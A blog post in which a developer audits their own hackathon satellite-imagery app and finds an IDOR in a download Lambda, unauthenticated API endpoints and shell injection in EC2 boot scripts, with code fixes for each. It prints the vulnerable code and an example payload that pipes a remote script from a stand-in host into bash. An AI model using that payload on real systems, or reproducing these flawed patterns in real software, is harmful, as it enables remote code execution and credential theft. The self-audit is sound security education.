Back in February I helped build a thing called Sentinel Eye for the HyperSpace Innovation Hackathon.
The pitch was simple. You draw a box anywhere on a map, and the system goes and fetches Sentinel-2 satellite imagery for that exact patch of Earth, runs the math on it, and tells you where forest got cut down or where a city quietly ate a field. Draw a rectangle over the Amazon, wait a few minutes, get back real GeoTIFF files showing deforestation. It felt like magic. It got us to nationals. I was very proud of it.
Then the hackathon ended, the AWS credits dried up, and I tore the whole thing down before it could start charging me rent.
Fast forward a few months. I have been learning security properly, finished TCM's Practical Ethical Hacking course, and I now spend my evenings on PortSwigger labs like a normal well-adjusted person. And I had a cursed idea. What if I went back and read my own code from February, except this time I read it the way someone trying to break in would, instead of the way someone trying to survive a demo at 3am does?
It took about ten minutes to find the first hole. Then I found two more. Come look at the crime scene with me.
Act one: the download button that downloads anything
I started with the download endpoint, because "here is your file" routes are exactly where hackathon me cut the most corners. Here is the actual Lambda, trimmed a little:
def lambda_handler(event, context):
    body = json.loads(event.get('body', '{}'))
    job_id = body.get('job_id')
    file_type = body.get('file_type')
    s3_key = body.get('s3_key')  # the client tells us which file it wants
    download_url = s3_client.generate_presigned_url(
        'get_object',
        Params={'Bucket': BUCKET_NAME, 'Key': s3_key},
        ExpiresIn=EXPIRATION
    )
    return {'statusCode': 200, 'body': json.dumps({'download_url': download_url})}
Look at the s3_key line. The client sends a key, and the server goes "sure, signed URL for whatever you asked for, coming right up." There is no check that the key belongs to your job. No check that it belongs to you at all. Want results/some-other-persons-job/deforestation.tif? Done. Want to start guessing your way around the rest of the bucket? Knock yourself out.
This is a textbook IDOR, an insecure direct object reference, and I implemented it with the calm confidence of a man who had never once considered that a stranger might call his API. In my head the only thing that would ever hit this endpoint was my own React app, politely handing back the exact key the server had just given it. But APIs do not run on the honor system. The client is not your friend. The client is a text box that anyone on the internet can type into.
The fix is boring, which is the point. Do not let the caller name the file. Take the job_id, confirm the request actually owns that job, and build the key on the server from values you control. The client should be able to say "give me the deforestation result for my job," not "give me arbitrary object number whatever."
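Here is a minimal sketch of what that could look like, not the code I actually shipped. It assumes job IDs are UUIDs, that results live under results/<job_id>/ (as in the example path above), and that there is some record of who owns each job. The names build_result_key, job_owners and caller_id are made up for illustration; in a real deployment the caller's identity would come from whatever auth sits in front of the Lambda.

```python
import re

# Assumption: job IDs are UUIDs. Adjust the pattern to the real format.
JOB_ID_PATTERN = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"
)

# Assumption: a fixed map from result type to file name. Only
# "deforestation" is taken from the post; extend as needed.
ALLOWED_FILE_TYPES = {"deforestation": "deforestation.tif"}


def build_result_key(job_id, file_type, caller_id, job_owners):
    """Build the S3 key on the server, or raise if the request is not allowed.

    job_owners is a stand-in for a real lookup (a database table, say)
    that maps each job_id to the identity that created it.
    """
    if not isinstance(job_id, str) or not JOB_ID_PATTERN.fullmatch(job_id):
        raise ValueError("invalid job_id")
    if not isinstance(file_type, str) or file_type not in ALLOWED_FILE_TYPES:
        raise ValueError("unknown file_type")

    owner = job_owners.get(job_id)
    if owner is None or owner != caller_id:
        raise PermissionError("job does not belong to caller")

    # Every part of the key comes from values the server has validated.
    return f"results/{job_id}/{ALLOWED_FILE_TYPES[file_type]}"
```

The handler would then pass the returned key to generate_presigned_url and ignore any s3_key field in the request body.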
Act two: the endpoint anyone could use to spend my money
Next I went looking for the auth. Reader, there was no auth.
Here is the relevant line from my own deploy script, where I create the API Gateway methods:
aws apigateway put-method \
  --rest-api-id $API_ID \
  --resource-id $ANALYZE_RESOURCE_ID \
  --http-method POST \
  --authorization-type NONE
authorization-type NONE. Both the analyze endpoint and the download endpoint were wide open to the entire internet. No API key, no token, nothing.
Now remember what the analyze endpoint actually does. It calls a paid satellite imagery API, then launches an EC2 instance to crunch the data. Every single request costs real money and spins up real compute. An open endpoint that launches servers is not a feature, it is a GoFundMe for whoever finds it. A bored person with a for loop could have turned my AWS bill into a phone number. The fun part is that EC2 instances launching in a loop is exactly the kind of thing you do not notice until the email arrives.
Lock the endpoints behind auth, put rate limiting in front of them, and validate the input so nobody can request a 10,000 square kilometer region "just to see." None of that occurred to me at the time because the app worked when I clicked the button, and when the app works, builder brain declares victory and goes to sleep.
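Auth and rate limiting are mostly API Gateway configuration, but the input validation part is easy to sketch in code. This is a rough example under some loud assumptions: that the request carries the region as a bbox field in [west, south, east, north] degrees, that 2,500 square kilometers is a sensible cap, and that the change types are a small fixed set. None of those names or numbers come from the real project, except "deforestation".

```python
import math

EARTH_RADIUS_KM = 6371.0
MAX_AREA_KM2 = 2500.0  # assumption: pick a cap that matches your budget
# Assumption: the allowed set; only "deforestation" is taken from the post.
ALLOWED_CHANGE_TYPES = {"deforestation", "urban_expansion"}


def bbox_area_km2(west, south, east, north):
    """Area of a latitude/longitude rectangle on a spherical Earth."""
    lon_span = math.radians(east - west)
    lat_term = math.sin(math.radians(north)) - math.sin(math.radians(south))
    return EARTH_RADIUS_KM ** 2 * lon_span * lat_term


def _is_number(value):
    # bool is a subclass of int, so exclude it explicitly.
    return isinstance(value, (int, float)) and not isinstance(value, bool)


def validate_analyze_request(body):
    """Return a cleaned copy of the request, or raise ValueError."""
    bbox = body.get("bbox")
    if not (isinstance(bbox, list) and len(bbox) == 4
            and all(_is_number(v) for v in bbox)):
        raise ValueError("bbox must be four numbers")

    west, south, east, north = bbox
    # NaN fails every comparison, so it is rejected here too.
    if not (-180 <= west < east <= 180 and -90 <= south < north <= 90):
        raise ValueError("bbox coordinates out of range")
    if bbox_area_km2(west, south, east, north) > MAX_AREA_KM2:
        raise ValueError("requested region is too large")

    change_types = body.get("change_types")
    if not isinstance(change_types, list) or not change_types:
        raise ValueError("change_types must be a non-empty list")
    for item in change_types:
        if not isinstance(item, str) or item not in ALLOWED_CHANGE_TYPES:
            raise ValueError("unknown change type")

    return {"bbox": [west, south, east, north], "change_types": change_types}
```

The allowlist matters more than it looks. A change_types value that can only ever be one of a few known strings cannot carry a surprise, which becomes relevant in the next act.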
Act three: the one that made me put my head on the desk
This is the launch function. When a job comes in, this code builds a startup script and hands it to a fresh EC2 instance to run at boot:
user_data_script = f"""#!/bin/bash
cd /home/ec2-user
aws s3 cp s3://{BUCKET_NAME}/scripts/ec2_dynamic_processor.py ./
python3 ec2_dynamic_processor.py '{job_id}' '{json.dumps(start_data)}' '{json.dumps(end_data)}' '{json.dumps(change_types)}'
sudo shutdown -h now
"""
So the instance boots and runs this bash script. And the script pastes my variables straight into a command, wrapped in single quotes. One of those variables is change_types, and change_types comes directly from the request body. Which, as we established in act two, is whatever a complete stranger felt like sending.
Single quotes in bash protect you right up until someone types a single quote.
If change_types is ["deforestation"], everything is fine and the world keeps turning. If change_types is ["'; curl evil.sh | bash #"], that little quote character closes my string early, and everything after it runs as a shell command. On my EC2 box. With the instance's IAM role attached, ready to be borrowed.
That is not a bug. That is remote code execution with a side of free credentials. I set out to build a tool that detects deforestation and I accidentally shipped a tool that detects whether you would like a shell on my server.
The fix here is to stop building shell commands out of strings entirely. Pass the data through a file or an environment variable, or honestly just do the work in the Lambda and skip the "interpolate user input into bash at boot" genre of decision altogether.
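One way the "pass it through a file" option might look, as a sketch rather than a drop-in fix: the request data is serialized to JSON and stored in S3, and the boot script only ever contains the bucket name (server-controlled) and a job_id that has been checked against a strict pattern. The jobs/<job_id>/input.json key layout, the build_launch_inputs name and the UUID pattern are all assumptions, and ec2_dynamic_processor.py would need to be changed to read its arguments from that file instead of argv.

```python
import json
import re

# Assumption: job IDs are UUIDs, so they contain no shell metacharacters.
JOB_ID_PATTERN = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"
)


def build_launch_inputs(bucket, job_id, start_data, end_data, change_types):
    """Return (input_key, payload, user_data) for one job.

    The caller uploads payload to s3://bucket/input_key before launching
    the instance. No request data is interpolated into the shell script.
    """
    if not isinstance(job_id, str) or not JOB_ID_PATTERN.fullmatch(job_id):
        raise ValueError("invalid job_id")

    input_key = f"jobs/{job_id}/input.json"  # hypothetical key layout
    payload = json.dumps({
        "job_id": job_id,
        "start_data": start_data,
        "end_data": end_data,
        "change_types": change_types,
    })

    # Only the bucket name and the validated job_id appear in the script.
    user_data = "\n".join([
        "#!/bin/bash",
        "cd /home/ec2-user",
        f"aws s3 cp s3://{bucket}/scripts/ec2_dynamic_processor.py ./",
        f"aws s3 cp s3://{bucket}/{input_key} ./input.json",
        "python3 ec2_dynamic_processor.py ./input.json",
        "sudo shutdown -h now",
    ]) + "\n"
    return input_key, payload, user_data
```

With this shape, a hostile change_types value ends up as an inert string inside a JSON file. Bash never parses it, so there is no quote for it to close.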
In fairness to past me, who is currently being dragged
A few things were not actually terrible, and I want credit for them because the rest of this post is rough:
- The SentinelHub API keys lived in AWS Secrets Manager, not hardcoded in the repo. The bar is on the floor, but I cleared it.
- The permission to read that secret was scoped to that one secret, not "every secret in the account, please."
- Downloads went through expiring presigned URLs instead of a public bucket.
- The EC2 boxes shut themselves down after each job, so even the injection had a smallish window to play in.
So the instincts were not all bad. The actual problem was simpler than any single bug. I spent the entire hackathon thinking like a builder. Builder brain asks one question: does the happy path work? It clicks the button, sees the right output, and goes home happy. Attacker brain asks a different question: what happens when I do the obviously cursed thing you clearly did not plan for? Those are two different muscles, and back then I had only ever trained one of them.
Reading your own old code with the other muscle is genuinely one of the best ways I have found to learn this stuff. There is no tutorial, no contrived "spot the vuln" lab, just past you leaving the door open and present you walking through it going "oh no. oh no, I did this."
The code is on my GitHub if you want to point and laugh, or quietly check whether you have written the same three bugs (you probably have, we all have, it is fine).
Anyway. Go reread something you built a few months ago. Bring snacks. You are going to find something.